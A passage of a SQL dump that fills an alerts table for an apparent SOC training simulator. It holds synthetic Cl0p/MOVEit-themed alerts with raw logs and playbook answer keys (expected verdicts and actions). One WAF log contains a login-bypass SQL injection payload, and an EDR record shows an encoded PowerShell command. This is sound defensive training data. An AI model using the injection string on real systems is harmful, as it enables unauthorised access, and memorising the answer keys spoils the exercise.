4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:43Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"New service installed for persistence.\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(589, 'Lateral Movement: Unauthorized Access Detected', 'high', 'Network Traffic Analysis', 'Attackers are attempting to expand their foothold by moving laterally within the network, targeting sensitive data stores and critical systems. Unauthorized access was detected from an external IP to multiple internal systems.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:12:34Z\",\"event_id\":\"LM-20231005-001\",\"source_ip\":\"203.0.113.45\",\"destination_ips\":[\"10.0.5.25\",\"192.168.1.14\"],\"username\":\"jdoe_admin\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"detected_action\":\"User jdoe_admin accessed multiple systems within a short time frame\",\"file_accessed\":\"confidential_financial_data.xlsx\",\"alert\":\"Suspicious lateral movement detected from external IP 203.0.113.45 using compromised credentials.\"}', '2026-01-08 22:09:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Local network IP, no suspicious activity recorded.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Local network IP, no suspicious activity recorded.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in abnormal access 
patterns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used for credential theft.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(590, 'Exfiltration: Data Transfer Anomaly', 'critical', 'Data Loss Prevention (DLP) Systems', 'Anomalous data transfer activities are detected, indicating potential exfiltration of sensitive information to external servers controlled by the attackers. The data transfer volume and destination IPs suggest a sophisticated exfiltration attempt.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"DLP-20231015142345-001\",\"source_ip\":\"10.0.0.5\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"financial_report_q3_2023.xlsx\",\"hash\":\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\",\"data_volume\":\"2GB\",\"protocol\":\"HTTPS\",\"action_taken\":\"Alerted\",\"description\":\"Detected large data transfer to external IP not whitelisted.\"}', '2026-01-08 22:09:13', '2026-02-16 18:05:54', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration endpoint associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Employee: John Doe, Sales Department.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive financial information.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"File 
Hashing Database\",\"verdict\":\"suspicious\",\"details\":\"File hash not recognized in the internal database.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.226Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-20231015142345-001\\\",\\\"source_ip\\\":\\\"10.0.0.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"Detected large data transfer to external IP not whitelisted.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.226Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-20231015142345-001\\\",\\\"source_ip\\\":\\\"10.0.0.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"Detected large data transfer to external IP not whitelisted.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.226Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-20231015142345-001\\\",\\\"source_ip\\\":\\\"10.0.0.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"Detected large data transfer to external IP not whitelisted.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.226Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-20231015142345-001\\\",\\\"source_ip\\\":\\\"10.0.0.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"Detected large data transfer to external IP not whitelisted.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.226Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-20231015142345-001\\\",\\\"source_ip\\\":\\\"10.0.0.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"Detected large data transfer to external IP not 
whitelisted.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(591, 'Initial Access via SQL Injection', 'high', 'Web application firewall logs', 'Cl0p identifies and exploits an SQL injection vulnerability in the MOVEit platform, allowing unauthorized access to sensitive databases.', 'Exploitation of Vulnerability', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"WAF123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"method\":\"GET\",\"url\":\"https://moveit.example.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"request_payload\":\"username=admin\' OR 1=1-- &password=dummy\",\"response_code\":200,\"signature_id\":\"SQLi-2023-001\",\"description\":\"SQL Injection attempt detected\"}', '2026-01-08 22:12:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous SQL injection attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal MOVEit server.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://moveit.example.com/login\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Web Application\",\"verdict\":\"clean\",\"details\":\"Legitimate web application URL.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(592, 'Automated Execution of Data Harvesting Scripts', 'high', 'Endpoint detection and response (EDR) tools', 'Following initial access, Cl0p group deployed automated JavaScript scripts on the compromised MOVEit infrastructure to systematically extract large volumes of sensitive data.', 'T1059.007: Command and Scripting Interpreter: JavaScript', 'T1059.007', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"compromised-host\",\"detected_script\":\"/var/tmp/data_harvest.js\",\"hash\":\"ec2f4a6b3e8fbc4a9d1f2c3d4e5f6a7b8c9d0e1f\",\"attacker_ip\":\"203.0.113.66\",\"user\":\"john_doe\",\"process_id\":4567,\"command_line\":\"node /var/tmp/data_harvest.js\",\"execution_time\":\"2023-10-05T14:23:30Z\"}', '2026-01-08 22:12:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"ec2f4a6b3e8fbc4a9d1f2c3d4e5f6a7b8c9d0e1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with Cl0p activities\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.66\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account used in suspicious script execution\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"/var/tmp/data_harvest.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as part of data exfiltration 
operation\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(593, 'Establishing Persistence within Networks', 'high', 'System startup and logon logs', 'Cl0p group has established persistence by modifying the system logon scripts to execute malicious binaries during system startup. This action ensures continued access for prolonged data theft.', 'T1547: Boot or Logon Autostart Execution', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:23Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host\",\"logon_type\":\"2\",\"source_ip\":\"203.0.113.45\",\"username\":\"admin_user\",\"logon_process\":\"User32\",\"file_path\":\"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"description\":\"User logon with modified startup script executing malware.\"}', '2026-01-08 22:12:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligenceDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cl0p group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File recognized as a Cl0p group persistence mechanism.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cl0p malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User account compromised by 
adversary.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.229Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"logon_type\\\":\\\"2\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"User logon with modified startup script executing malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.229Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"logon_type\\\":\\\"2\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"User logon with modified startup script executing 
malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.229Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"logon_type\\\":\\\"2\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"User logon with modified startup script executing malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.229Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"logon_type\\\":\\\"2\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"User logon with modified startup script executing malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.229Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"logon_type\\\":\\\"2\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"User logon with modified startup script executing malware.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(594, 'Lateral Movement to Enhance Data Access', 'high', 'Network traffic analysis', 'Suspicious lateral movement detected within the organization network indicating potential attempt to enhance data access by hiding indicators on host systems.', 'T1070: Indicator Removal on Host', 'T1070', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:22:18Z\",\"event_id\":\"4634\",\"source_ip\":\"203.0.113.56\",\"destination_ip\":\"192.168.1.45\",\"destination_host\":\"file-server-02\",\"malware_hash\":\"3f4d5c6e7b8e9f0a123456789abcdef0\",\"user\":\"admin_user\",\"filename\":\"cl0p_removal_tool.exe\",\"action\":\"Indicator removal\",\"log_message\":\"Possible use of Cl0p malware detected. Unusual indicator removal activity from 203.0.113.56 targeting 192.168.1.45 by user admin_user using cl0p_removal_tool.exe.\"}', '2026-01-08 22:12:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Cl0p APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset\",\"verdict\":\"internal\",\"details\":\"Internal file server targeted by the threat.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f4d5c6e7b8e9f0a123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cl0p malware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"cl0p_removal_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Filename associated with Cl0p malware activities.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User 
Database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(595, 'Mass Exfiltration and Unique Extortion', 'high', 'Outbound network traffic logs', 'In the final act, Cl0p exfiltrates data to external servers and initiates a unique extortion campaign, threatening public release rather than deploying ransomware. The operation involved transferring large volumes of data to a known malicious IP associated with Cl0p\'s command and control infrastructure.', 'T1041: Exfiltration Over C2 Channel', 'Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:17Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"185.225.19.78\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"bytes_out\":987654321,\"username\":\"jdoe\",\"filename\":\"financial_data_backup.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"ALLOW\"}', '2026-01-08 22:12:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.225.19.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Cl0p C2 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potential data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_data_backup.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"File matches internal naming conventions for sensitive data backups.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
